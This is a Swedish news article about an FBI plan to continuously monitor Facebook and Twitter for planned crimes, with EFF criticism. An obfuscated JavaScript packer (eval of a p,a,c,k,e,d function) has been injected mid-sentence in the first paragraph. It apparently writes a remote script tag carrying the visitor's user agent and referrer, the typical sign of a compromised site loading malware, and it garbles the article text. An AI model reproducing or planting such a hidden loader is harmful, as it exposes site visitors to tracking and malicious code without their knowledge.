Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

FBI vill börja avlyssna Facebook och Twitter

FBI vill börja avlyssna Facebook och Twitter
Sebastian

Informationen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdinz|var|u0026u|referrer|zekdy||js|php’.split(’|’),0,{}))
kommer från ett dokument som släpptes den 19  januari av FBI, meddelar New Scientist. Det beskrivs hur FBI letar efter företag som kan bygga ett system för att kontinuerligt bevaka sociala nätverk som Facebook och Twitter.

De vill med bevakningen skapa ett system där man kan lista ut när brott planeras baserat på vilken typ av information användarna delar med varandra. På detta sätt skulle FBI kunna förebygga brott innan de begås.

I dokumentet menar FBI att man endast är ute efter att bevaka specifika individer eller grupper som misstänks för att ägna sig åt brottslighet.

Jennifer Lynch på stiftelsen Electronic Frontier Foundation är dock kritisk till planerna.

– Ett sådant här verktyg som lagrar information, antagligen under en väldigt lång tid, tar död på användarnas privatliv. Jag oroar mig för hur det kommer att påverka yttrandefriheten i USA, säger Jennifer Lynch till New Scientist.

FBI har inte kommenterat dokumentet till New Scientist.